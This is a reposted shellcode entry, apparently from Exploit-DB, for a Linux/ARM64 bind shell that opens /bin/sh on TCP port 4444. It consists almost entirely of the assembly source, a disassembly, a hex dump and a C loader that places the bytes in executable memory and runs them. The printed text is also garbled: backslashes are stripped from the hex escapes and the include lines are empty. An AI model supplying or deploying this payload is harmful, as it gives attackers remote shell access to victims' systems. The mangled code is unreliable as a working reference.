Exploit/Advisories
Published on July 2nd, 2019 📆 | 7889 Views ⚑
0Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)
/*
# Title: Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)
# Date: 2019-06-30
# Tested: Ubuntu 16.04 (aarch64)
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c
ubuntu@ubuntu:~/works$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu Xenial Xerus (development branch)
Release: 16.04
Codename: xenial
ubuntu@ubuntu:~/works$ uname -a
Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
ubuntu@ubuntu:~/works$ cat bindshell.s
.section .text
.global _start
_start:
// s = socket(2, 1, 0)
mov x8, #198
lsr x1, x8, #7
lsl x0, x1, #1
mov x2, xzr
svc #0x1337
// save s
mvn x4, x0
// bind(s, &sockaddr, 16)
lsl x1, x1, #1
movk x1, #0x5C11, lsl #16
str x1, [sp, #-8]!
add x1, sp, x2
mov x2, #16
mov x8, #200
svc #0x1337
// listen(s, 2)
mvn x0, x4
lsr x1, x2, #3
mov x8, #201
svc #0x1337
mov x5, x1
// a = accept(s, 0, 0)
mvn x0, x4
mov x1, xzr
mov x2, xzr
mov x8, #202
svc #0x1337
// save a
mvn x4, x0
lsl x1, x5, #1
dup3:
// dup3(s, 2, 0)
// dup3(s, 1, 0)
// dup3(s, 0, 0)
mvn x0, x4
lsr x1, x1, #1
mov x2, xzr
mov x8, #24
svc #0x1337
mov x10, xzr
cmp x10, x1
bne dup3
// execve("/bin/sh", 0, 0)
mov x3, #0x622F
movk x3, #0x6E69, lsl #16
movk x3, #0x732F, lsl #32
movk x3, #0x68, lsl #48
str x3, [sp, #-8]!
add x0, sp, x1
mov x8, #221
svc #0x1337
ubuntu@ubuntu:~/works$ as -o bindshell.o bindshell.s && ld -o bindshell bindshell.o
ubuntu@ubuntu:~/works$ objdump -d ./bindshell
./bindshell: file format elf64-littleaarch64
Disassembly of section .text:
0000000000400078 :
400078: d28018c8 mov x8, #0xc6 // #198
40007c: d347fd01 lsr x1, x8, #7
400080: d37ff820 lsl x0, x1, #1
400084: aa1f03e2 mov x2, xzr
400088: d40266e1 svc #0x1337
40008c: aa2003e4 mvn x4, x0
400090: d37ff821 lsl x1, x1, #1
400094: f2ab8221 movk x1, #0x5c11, lsl #16
400098: f81f8fe1 str x1, [sp,#-8]!
40009c: 8b2263e1 add x1, sp, x2
4000a0: d2800202 mov x2, #0x10 // #16
4000a4: d2801908 mov x8, #0xc8 // #200
4000a8: d40266e1 svc #0x1337
4000ac: aa2403e0 mvn x0, x4
4000b0: d343fc41 lsr x1, x2, #3
4000b4: d2801928 mov x8, #0xc9 // #201
4000b8: d40266e1 svc #0x1337
4000bc: aa0103e5 mov x5, x1
4000c0: aa2403e0 mvn x0, x4
4000c4: aa1f03e1 mov x1, xzr
4000c8: aa1f03e2 mov x2, xzr
4000cc: d2801948 mov x8, #0xca // #202
4000d0: d40266e1 svc #0x1337
4000d4: aa2003e4 mvn x4, x0
4000d8: d37ff8a1 lsl x1, x5, #1
00000000004000dc :
4000dc: aa2403e0 mvn x0, x4
4000e0: d341fc21 lsr x1, x1, #1
4000e4: aa1f03e2 mov x2, xzr
4000e8: d2800308 mov x8, #0x18 // #24
4000ec: d40266e1 svc #0x1337
4000f0: aa1f03ea mov x10, xzr
4000f4: eb01015f cmp x10, x1
4000f8: 54ffff21 b.ne 4000dc
4000fc: d28c45e3 mov x3, #0x622f // #25135
400100: f2adcd23 movk x3, #0x6e69, lsl #16
400104: f2ce65e3 movk x3, #0x732f, lsl #32
400108: f2e00d03 movk x3, #0x68, lsl #48
40010c: f81f8fe3 str x3, [sp,#-8]!
400110: 8b2163e0 add x0, sp, x1
400114: d2801ba8 mov x8, #0xdd // #221
400118: d40266e1 svc #0x1337
ubuntu@ubuntu:~/works$ objcopy -O binary bindshell bindshell.bin
ubuntu@ubuntu:~/works$ hexdump -v -e '"""x" 1/1 "%02x" ""' bindshell.bin && echo
xc8x18x80xd2x01xfdx47xd3x20xf8x7fxd3xe2x03x1fxaaxe1x66x02xd4xe4x03x20xaax21xf8x7fxd3x21x82xabxf2xe1x8fx1fxf8xe1x63x22x8bx02x02x80xd2x08x19x80xd2xe1x66x02xd4xe0x03x24xaax41xfcx43xd3x28x19x80xd2xe1x66x02xd4xe5x03x01xaaxe0x03x24xaaxe1x03x1fxaaxe2x03x1fxaax48x19x80xd2xe1x66x02xd4xe4x03x20xaaxa1xf8x7fxd3xe0x03x24xaax21xfcx41xd3xe2x03x1fxaax08x03x80xd2xe1x66x02xd4xeax03x1fxaax5fx01x01xebx21xffxffx54xe3x45x8cxd2x23xcdxadxf2xe3x65xcexf2x03x0dxe0xf2xe3x8fx1fxf8xe0x63x21x8bxa8x1bx80xd2xe1x66x02xd4
*/
#include
#include
#include
#include
int (*sc)();
char shellcode[] =
"xc8x18x80xd2x01xfdx47xd3x20xf8x7fxd3xe2x03x1fxaa"
"xe1x66x02xd4xe4x03x20xaax21xf8x7fxd3x21x82xabxf2"
"xe1x8fx1fxf8xe1x63x22x8bx02x02x80xd2x08x19x80xd2"
"xe1x66x02xd4xe0x03x24xaax41xfcx43xd3x28x19x80xd2"
"xe1x66x02xd4xe5x03x01xaaxe0x03x24xaaxe1x03x1fxaa"
"xe2x03x1fxaax48x19x80xd2xe1x66x02xd4xe4x03x20xaa"
"xa1xf8x7fxd3xe0x03x24xaax21xfcx41xd3xe2x03x1fxaa"
"x08x03x80xd2xe1x66x02xd4xeax03x1fxaax5fx01x01xeb"
"x21xffxffx54xe3x45x8cxd2x23xcdxadxf2xe3x65xcexf2"
"x03x0dxe0xf2xe3x8fx1fxf8xe0x63x21x8bxa8x1bx80xd2"
"xe1x66x02xd4";
int main(int argc, char **argv) {
printf("Shellcode Length: %zd Bytesn", strlen(shellcode));
void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}
https://www.exploit-db.com/exploits/47049
Gloss